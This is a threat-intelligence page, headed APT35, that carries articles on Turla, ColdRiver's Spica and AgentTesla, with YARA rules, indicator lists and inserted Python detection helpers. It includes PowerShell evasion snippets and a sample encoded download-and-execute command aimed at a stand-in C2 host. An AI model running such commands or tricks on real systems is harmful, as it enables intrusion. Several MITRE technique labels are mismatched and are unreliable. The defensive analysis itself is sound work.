
APT35


Magic Hound (APT35): Iranian State-Sponsored Cyber Espionage

Discover the tactics of Magic Hound (APT35), an Iranian state-sponsored threat group, targeting various industries with sophisticated cyber espionage campaigns

07-Aug-2023
12 min read

Related Articles


Turla

APT

Uncover the latest tactics of Russia's Turla APT. This technical report analyze...

Turla, a Russian state-sponsored Advanced Persistent Threat (APT) group, conducts sophisticated cyberespionage against government institutions, NGOs, and organizations aligned with Russian interests. This [Threat Research](https://www.secureblink.com/threat-research) provides a detailed analysis of Turla's historical context, recent operations named "Turla Wields," and a thorough technical analysis of their tools and techniques.

### Origins and Historical Context

Turla, also known as Snake, Uroburos, Waterbug, and Venomous Bear, emerged in the late 1990s, targeting governments and militaries globally. Their operations align with Russia's geopolitical interests, focusing on nations bordering Russia and former Soviet states. Turla is adept at evading detection, preferring long-term intelligence gathering over disruptive attacks.

### Turla Wields: Recent Attack Trends and Targeting

Recent campaigns target NGOs, particularly those supporting Ukrainian causes. Turla exploits legacy infections such as the Andromeda botnet, employs spear-phishing with weaponized PDFs, and constantly evolves its toolkit, including TinyTurla-NG and TurlaPower-NG. Motives range from military intelligence gathering to destabilizing opposition parties and supporting hybrid warfare.

### Technical Analysis of Turla Techniques

Turla's initial infection vectors include spear-phishing, zero-day vulnerabilities, and compromised websites. They establish persistence using TinyTurla-NG, leveraging DLL loading and file masquerading. Communication with command and control servers is disguised within regular web traffic, employing redundant C2s for resilience.

### Data Exfiltration Techniques

Turla employs custom tools like TurlaPower-NG to target password managers and browser history databases. Data exfiltration involves file archiving and staged uploads, obscuring their activities over time.

### "Living off the Land" Approach

Turla increasingly relies on PowerShell for operations, employing obfuscation techniques and disabling command history recording to evade detection.

### Countermeasures and Defense Considerations

Patching vulnerabilities, especially zero-days, is crucial. Endpoint Detection and Response (EDR) platforms with behavioral baselining and anomaly detection can spot Turla's subtle activities. Application and script whitelisting, along with security awareness training, enhance defenses. Web infrastructure hardening and intrusion detection systems are also recommended.

## Technical Analysis: Evolving Toolset Breakdown

### TinyTurla-NG and TurlaPower-NG Deep Dive

#### TinyTurla-NG

- Network Protocols: HTTP/HTTPS with custom headers and unusual User-Agent strings.
- C2 Commands: Task scheduling logic and data encoding for exfiltration.
- Persistence: Registry hiding, DLL hijacking methods, and boot-time execution.

#### TurlaPower-NG

- Target Files: Focus on password managers and browser history SQLite databases.
- Data Extraction Logic: Parsing methods and obfuscation techniques.
- Archiving: Compression and encryption methods used for file uploads.

### Obfuscation and Anti-Forensics

Turla employs meaningless variable names, packed executables, and sandbox evasion techniques to hinder analysis. They ensure minimal forensic traces by cleaning temporary files and overwriting disk images.

### Historical Malware Progression

Turla's tools have evolved from executable-based to PowerShell-based, leveraging trusted Windows programs for stealth and adaptability. Staged exfiltration and variable beaconing remain consistent features across toolsets.

## Victim Profiling & Targeting Patterns

### Target Industries & Organizations

Turla targets a range of industries, including defense, technology, government, diplomacy, and NGOs. Specific organizations and job titles vary, with a focus on technical staff for network compromise and decision-makers for policy insight.

### Geographic Shifts & Geopolitical Correlation

Turla's targeting intensifies around geopolitical events involving Russia, such as elections and conflicts. Analysis reveals patterns of intelligence gathering preceding significant actions, indicating strategic alignment with Russian interests.

## Code Snippets for Detection

The following are representative indicators based on open-sourced reports on TinyTurla-NG and similar C2 mechanisms Turla often uses. Use with caution – APTs evolve, so these patterns may change in future samples.

#### Registry Modification (Possible Turla DLL Loading)

`HKEY_CURRENT_USER\Software\Classes\CLSID\{<unusual-looking-GUID>}`: suspicious values within this key can point to persistence via COM object loading.

#### Unusual HTTP Beaconing Traffic Patterns

```yara
// Example YARA-like pattern, simplified, targeting WordPress C2 traffic
rule turla_wp_beacon {
    meta:
        description = "Possible Turla compromise of WordPress sites for C2"
        author = "<Your Org Name>"
        date = "2024-02-27"
    strings:
        // text string, not a hex string: the header must be quoted
        $http_header = "Content-Type: multipart/form-data;"
        $beacon_id = /page=[0-9]{8}/
    condition:
        all of them
}
```

#### PowerShell Obfuscation Techniques (Simplified Examples)

```powershell
# Base64 Encoding to Conceal Commands
$cmd = "iex <base64 encoded command>"
Invoke-Expression $cmd

# Modifying Command Execution Flow
$var = 'Something'; $var[3..1] -join ''   # Reconstructs a hidden string

# PowerShell History Evasion
Set-PSReadLineOption -HistorySaveStyle SaveNothing
```

## Conclusion

Turla's persistence and adaptability make them a formidable threat to global security. Understanding their techniques and motivations is crucial for developing effective defense strategies. By implementing rigorous countermeasures and leveraging threat intelligence, organizations can mitigate the risk posed by Turla's cyberespionage activities.
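As an added example (not code from the article), the following Python scans constructed PowerShell script-block and process-creation log lines for the three tricks listed above, decoding an embedded Base64 payload and re-scanning it so a history-evasion command hidden behind `-EncodedCommand` is still surfaced; the regexes, the log line format and the sample lines are assumptions.

```python
import base64
import re
# Added example (not from the article): heuristics for the three PowerShell
# tricks listed above, run over constructed script-block / process log lines.
B64_BLOB = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{32,}={0,2}(?![A-Za-z0-9+/])")
PATTERNS = {
    # execution primitive (iex, -EncodedCommand, FromBase64String) next to a Base64 blob
    "base64_exec": re.compile(
        r"\biex\b|invoke-expression|FromBase64String|(?:^|\s)-e(?:c|nc|ncodedcommand)?\s",
        re.IGNORECASE),
    # char-array slicing joined back into a string, e.g. $v[3..1] -join ''
    "index_reconstruct": re.compile(r"\$\w+\[\s*\d+\s*\.\.\s*\d+\s*\]\s*-join\b", re.IGNORECASE),
    # PSReadLine history disabled, so ConsoleHost_history.txt records nothing
    "history_evasion": re.compile(r"Set-PSReadLineOption\b.*-HistorySaveStyle\s+SaveNothing",
                                  re.IGNORECASE),
}

def decode_blob(blob: str) -> str:
    """-EncodedCommand payloads are UTF-16LE; anything else is treated as UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return ""
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le", errors="ignore")
    return raw.decode("utf-8", errors="ignore")

def scan_script_block(text: str, depth: int = 0) -> set:
    """Technique names seen in one log line; hits found only after decoding an
    embedded Base64 layer are prefixed with 'decoded:'."""
    found = {name for name, rx in PATTERNS.items() if rx.search(text)}
    if "base64_exec" in found and not B64_BLOB.search(text):
        found.discard("base64_exec")          # primitive without a payload on the line
    if "base64_exec" in found and depth < 3:
        for blob in B64_BLOB.findall(text):
            for inner in scan_script_block(decode_blob(blob), depth + 1):
                found.add("decoded:" + inner)
    return found

def _enc(cmd: str) -> str:                    # the form -EncodedCommand expects
    return base64.b64encode(cmd.encode("utf-16-le")).decode()

SAMPLE_LOGS = [  # constructed lines, not real telemetry
    "4104 ScriptBlockText: Get-ChildItem C:\\Users -Recurse | Measure-Object",
    "4104 ScriptBlockText: $var = 'Something'; $var[3..1] -join ''",
    "4688 CommandLine: powershell.exe -nop -w hidden -enc " + _enc(
        "Set-PSReadLineOption -HistorySaveStyle SaveNothing; "
        "iex (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"),
]

def triage(lines) -> dict:
    """Line index -> sorted findings, omitting clean lines."""
    results = {i: sorted(scan_script_block(line)) for i, line in enumerate(lines)}
    return {i: hits for i, hits in results.items() if hits}
```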

21-Feb-2024
1 min read

APT

Phishing

Explore ColdRiver's Spica malware in this detailed threat analysis. Uncover Russ...

ColdRiver, a Russia-backed advanced persistent threat (APT) group, has advanced its cyber espionage tactics by introducing a custom malware named "Spica." This marks a substantial departure from their traditional long-con credential phishing methods. Google's Threat Analysis Group (TAG) has been instrumental in tracking ColdRiver's activities, highlighting their ever-evolving techniques. This [Threat Research](https://www.secureblink.com/threat-research) extends that analysis of ColdRiver, dissecting the critical aspects of its Spica malware, the threat landscape, and potential countermeasures.

## Contextual Background

ColdRiver, also known as Blue Charlie, Callisto, Star Blizzard, or UNC4057, primarily targets high-profile individuals in NGOs, former intelligence and military officials, and NATO governments. Historically focused on credential phishing, the group has now extended its capabilities to deliver malware, specifically using PDFs as lure documents.

## Evolution of Tactics

The progression from traditional phishing to malware delivery is a strategic transition [observed](https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/) by TAG. ColdRiver employs impersonation accounts, posing as experts or individuals affiliated with the target, to establish trust. Recent findings reveal an intricate tactic where benign PDFs, presented as op-eds or articles, are delivered to targets. If the target cannot read the encrypted content, a link to a "decryption" utility is sent; that utility introduces the Spica backdoor.

## Spica Malware Analysis

### Infiltration and Execution

Spica, written in Rust, uses JSON over websockets for command and control (C2). Upon execution, it decodes an embedded PDF, which serves as a decoy while the malware establishes persistence and connects to the C2 server. The malware deploys an obfuscated PowerShell command that creates a scheduled task named "CalendarChecker" for persistence.

### Functional Capabilities

Spica functions as a versatile tool, executing arbitrary shell commands, stealing cookies from various browsers, uploading and downloading files, perusing the filesystem, and enumerating documents for exfiltration. The presence of multiple variants suggests a continuous evolution of the backdoor.

### Timeline and Persistence

TAG first observed Spica in September 2023, but they believe its usage dates back to November 2022. The malware, identified as "Proton-decrypter.exe," was likely active around August and September 2023. TAG notes the potential existence of multiple Spica versions, each with distinct embedded decoy documents.

## Implications and Targets

ColdRiver's strategic shift indicates a desire for broader capabilities, allowing them to conduct operations beyond conventional phishing. The targets include Ukraine, NATO countries, academic institutions, and NGOs. While specific victim profiles remain undisclosed, TAG emphasizes the limited and targeted use of Spica, aligning with ColdRiver's established tactics.

## Defensive Measures

To counter the ColdRiver threat, TAG emphasizes proactive security measures. All identified domains, websites, and files associated with the threat are added to Safe Browsing blocklists. Gmail and Workspace users targeted by government-backed attackers receive alerts, encouraging them to enable Enhanced Safe Browsing for Chrome and ensure device updates.

## Code and Technical Insights

### Spica Backdoor Code

TAG provides a YARA rule for detecting the Spica backdoor, outlining specific strings and patterns indicative of its presence. This code analysis aids cybersecurity professionals in identifying and mitigating potential threats.

```yara
rule SPICA__Strings {
    meta:
        author = "Google TAG"
        description = "Rust backdoor using websockets for C2 and embedded decoy PDF"
        hash = "37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9"
    strings:
        $s1 = "os_win.c:%d: (%lu) %s(%s) - %s"
        $s2 = "winWrite1"
        $s3 = "winWrite2"
        $s4 = "DNS resolution panicked"
        $s5 = "struct Dox"
        $s6 = "struct Telegram"
        $s8 = "struct Download"
        $s9 = "spica"
        $s10 = "Failed to open the subkey after setting the value."
        $s11 = "Card Holder: Bull Gayts"
        $s12 = "Card Number: 7/ 3310 0195 4865"
        $s13 = "CVV: 592"
        $s14 = "Card Expired: 03/28"
        $a0 = "agent\\src\\archive.rs"
        $a1 = "agent\\src\\main.rs"
        $a2 = "agent\\src\\utils.rs"
        $a3 = "agent\\src\\command\\dox.rs"
        $a4 = "agent\\src\\command\\shell.rs"
        $a5 = "agent\\src\\command\\telegram.rs"
        $a6 = "agent\\src\\command\\mod.rs"
        $a7 = "agent\\src\\command\\mod.rs"
        $a8 = "agent\\src\\command\\cookie\\mod.rs"
        $a9 = "agent\\src\\command\\cookie\\browser\\mod.rs"
        $a10 = "agent\\src\\command\\cookie\\browser\\browser_name.rs"
    condition:
        7 of ($s*) or 5 of ($a*)
}
```

## Conclusion

ColdRiver's adoption of the Spica malware is a calculated step in the evolution of its tradecraft. The extended analysis presented here offers a thorough breakdown of these tactics and techniques, Spica's technical intricacies, and recommended defensive measures.
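As an added example (not TAG's or the article's code), this Python re-implements the rule's `7 of ($s*) or 5 of ($a*)` condition as plain substring counting, so the thresholds can be exercised on constructed buffers without YARA installed; the buffers are constructed stand-ins for file contents, not real samples.

```python
# Added example: stand-alone re-implementation of SPICA__Strings' matching logic.
# The strings are copied from the rule above; the buffers below are constructed.
S_STRINGS = {
    "s1": b"os_win.c:%d: (%lu) %s(%s) - %s", "s2": b"winWrite1", "s3": b"winWrite2",
    "s4": b"DNS resolution panicked", "s5": b"struct Dox", "s6": b"struct Telegram",
    "s8": b"struct Download", "s9": b"spica",
    "s10": b"Failed to open the subkey after setting the value.",
    "s11": b"Card Holder: Bull Gayts", "s12": b"Card Number: 7/ 3310 0195 4865",
    "s13": b"CVV: 592", "s14": b"Card Expired: 03/28",
}
A_STRINGS = {  # Rust source paths; "\\" in the YARA text string is one backslash
    "a0": rb"agent\src\archive.rs", "a1": rb"agent\src\main.rs",
    "a2": rb"agent\src\utils.rs", "a3": rb"agent\src\command\dox.rs",
    "a4": rb"agent\src\command\shell.rs", "a5": rb"agent\src\command\telegram.rs",
    "a6": rb"agent\src\command\mod.rs",
    "a7": rb"agent\src\command\mod.rs",  # duplicated in the rule; YARA counts each identifier
    "a8": rb"agent\src\command\cookie\mod.rs",
    "a9": rb"agent\src\command\cookie\browser\mod.rs",
    "a10": rb"agent\src\command\cookie\browser\browser_name.rs",
}

def matched(strings: dict, data: bytes) -> list:
    """Identifiers whose pattern occurs in data (plain substring, like YARA text strings)."""
    return [name for name, pat in strings.items() if pat in data]

def spica_strings_matches(data: bytes) -> bool:
    """condition: 7 of ($s*) or 5 of ($a*)"""
    return len(matched(S_STRINGS, data)) >= 7 or len(matched(A_STRINGS, data)) >= 5

# Constructed buffers standing in for file contents (not real samples).
RUST_LIKE = b"\x00".join([b"spica", b"struct Dox", b"struct Telegram", b"struct Download",
                          b"winWrite1", b"winWrite2", b"DNS resolution panicked", b"padding"])
PANIC_PATHS = b"\n".join([rb"agent\src\main.rs", rb"agent\src\utils.rs",
                          rb"agent\src\command\mod.rs", rb"agent\src\command\shell.rs"])
DECOY_ONLY = b" ".join([b"Card Holder: Bull Gayts", b"CVV: 592", b"Card Expired: 03/28"])
```

Note that PANIC_PATHS carries only four distinct paths yet satisfies `5 of ($a*)`, because `$a6` and `$a7` are the same pattern under two identifiers.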

31-Jan-2024
1 min read

Infostealer

Explore the stealthy tactics of AgentTesla, distributed via deceptive CHM files ...

This threat research comprehensively analyzes the AgentTesla infostealer, which has been operating since 2014, delving into its intricate workings. The following sections provide a rigorous analysis of its tactics, evolution, and the technical nuances observed during recent encounters.

## Evolution of AgentTesla

### Initial Access via Spam Emails

AgentTesla infiltrates systems primarily through spam emails carrying malicious attachments, often in the form of .doc, .xls, and .ppt files. These attachments, housing macros, facilitate the installation of AgentTesla onto the victim's system.

#### Recent Encounter: Gzip Compressed File

On October 4, 2023, a malicious Gzip-compressed file uploaded to VirusTotal was found to initiate an AgentTesla infection. This underscores the malware's continuous evolution and adaptability in its attack vectors.

### CHM File Exploitation

AgentTesla's sophistication is evident in its use of CHM files, compressed with Gzip, acting as a lure. Recent campaigns indicate a focus on targeting professionals in network engineering, telecommunications, or information technology.

#### PowerShell Script Execution

Upon opening the crafted CHM file, a PowerShell script is downloaded from a remote server, encoded and deflated to avoid detection. This script in turn reveals a loader DLL file, named Hur.dll, responsible for loading the AgentTesla malware.

#### Infection Chain

The infection chain starts with a malicious spam email delivering a Gzip-compressed file that, upon execution, runs a PowerShell command, initiating the download and execution of AgentTesla.

### PDF-Based Attacks

AgentTesla exhibits versatility by utilizing PDF files for distribution. PDF campaigns employ two methods: triggering a PowerShell command, and displaying a fake message leading to the download of a PPAM file.

#### JavaScript Execution

Upon execution, the PDF initiates JavaScript execution, triggering a malicious PowerShell script hosted at "htlbook.blogspot.com/atom.xml".

## Technical Analysis

### PowerShell Script Decryption

The critical PowerShell script, "nn.txt," employs Base64 encoding and deflation to conceal a second Base64-encoded string representing a malicious DLL. This DLL, named Hur.dll, undergoes decryption, exposing encrypted data within its resource section.

#### Decrypted AgentTesla Payload

The decrypted data reveals the AgentTesla malware, invoking various APIs for malicious purposes. This payload exhibits complex and dynamic behavior, making it a formidable challenge to detect and eradicate.

### Campaign Variations

#### CHM Campaign Insights

Campaigns involving CHM files showcase AgentTesla's dynamic adaptation, with encrypted data in the resource section revealing a persistent threat.

#### PDF Campaign Nuances

PDF-based campaigns leverage JavaScript execution and fake messages to entice users into AgentTesla infection. The use of PPAM files and VBA macros further illustrates the malware's multifaceted approach.

## Conclusion

AgentTesla's resourceful tactics in data pilfering pose a significant and enduring threat to organizations and individuals alike. Its diverse attack vectors demand a multifaceted defense strategy, emphasizing the importance of robust email filtering, cautious link and attachment handling, and reliable antivirus solutions.

## Recommendations

1. Implement robust email filtering solutions to detect and block spam emails and malicious attachments.
2. Exercise caution when opening links and email attachments, verifying their authenticity.
3. Utilize reputable antivirus and Internet security software on all connected devices.
4. Stay informed about MITRE ATT&CK® techniques associated with AgentTesla, adapting defenses accordingly.

## MITRE ATT&CK® Techniques

### Initial Access

- Phishing (T1566.001): AgentTesla employs phishing emails with malicious attachments.

### Execution

- User Execution (T1203): Victims open malicious attachments, initiating AgentTesla execution.
- Command and Scripting Interpreter (T1059.001): PowerShell commands download and execute additional payloads.

### Persistence

- Registry Run Keys / Startup Folder (T1547.001): AgentTesla adds a run entry for persistence.

### Defense Evasion

- Masquerading (T1036.006): PowerShell scripts masquerade as text files.

### Collection

- Data from Local System (T1005): AgentTesla collects sensitive data from the victim's system.

### Command and Control

- Application Layer Protocol: Web Protocols (T1437.001): AgentTesla communicates with C&C servers using HTTP.

### Exfiltration

- Exfiltration Over C2 Channel (T1041): AgentTesla exfiltrates data over C&C channels.

## Indicators of Compromise (IOCs)

- Malicious CHM files, Gzip-compressed, SHA256 hashes: 5df434..., 00dc35..., a4de9d..., c7ebda..., 6665f9..., 0bcc3c...
- Malicious IP: 82.115.209.180
- Malicious Domains: htlbook.blogspot.com/atom.xml, hxxps://booking-comdetails.blogspot.com/
- Malicious PDF file, SHA256 hash: 92533be6c7fd...
- PPAM file, SHA256 hash: 3a8ac8048d42...

## Final Thoughts

This meticulous analysis underscores the ever-evolving threat landscape presented by AgentTesla. Organizations and individuals must remain vigilant, implementing proactive security measures to mitigate the risks posed by this resilient malware.
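As an added example (not the campaign's script or the Hur.dll loader), this Python peels the Base64 and deflate layers the analysis above describes for nn.txt and pulls the second Base64 string out of the recovered PowerShell text; the nested sample is built here from a placeholder payload, and the PE stop condition, the layer order and the helper names are assumptions.

```python
import base64
import re
import zlib
# Added example (not from the article): peel Base64/deflate layers; the nested
# blob is constructed from a placeholder payload so it can be exercised offline.
B64_WHOLE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")
B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{32,}={0,2}")

def is_text(data: bytes) -> bool:
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)

def decode_layer(data: bytes):
    """Apply one transform; return (label, output) or None if nothing applies."""
    stripped = b"".join(data.split())
    if stripped and B64_WHOLE.fullmatch(stripped):      # the whole blob is Base64
        try:
            return "base64", base64.b64decode(stripped, validate=True)
        except ValueError:
            return None
    if is_text(data):        # script text: pull out the longest embedded Base64 string
        tokens = B64_TOKEN.findall(data)
        if not tokens:
            return None
        try:
            return "base64-in-script", base64.b64decode(max(tokens, key=len), validate=True)
        except ValueError:
            return None
    for wbits in (-15, 15, 31):   # raw deflate (what .NET DeflateStream emits), zlib, gzip
        try:
            return "inflate", zlib.decompress(data, wbits)
        except zlib.error:
            pass
    return None

def unwrap(blob: bytes, max_layers: int = 8):
    """Return (final_bytes, trace); stops at a PE image (MZ) or when no layer applies."""
    trace, cur = [], blob
    for _ in range(max_layers):
        if cur.startswith(b"MZ"):
            break
        step = decode_layer(cur)
        if step is None:
            break
        trace.append(step[0])
        cur = step[1]
    return cur, trace

def build_sample() -> bytes:
    """Nest a placeholder 'DLL' the way the article describes nn.txt:
    PE -> Base64 inside a PowerShell line -> raw deflate -> Base64."""
    dll = b"MZ\x90\x00" + b"constructed placeholder, not the real Hur.dll"
    script = b"$bytes = [Convert]::FromBase64String('" + base64.b64encode(dll) + b"')\r\n"
    comp = zlib.compressobj(wbits=-15)
    return base64.b64encode(comp.compress(script) + comp.flush())
```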

17-Jan-2024
1 min read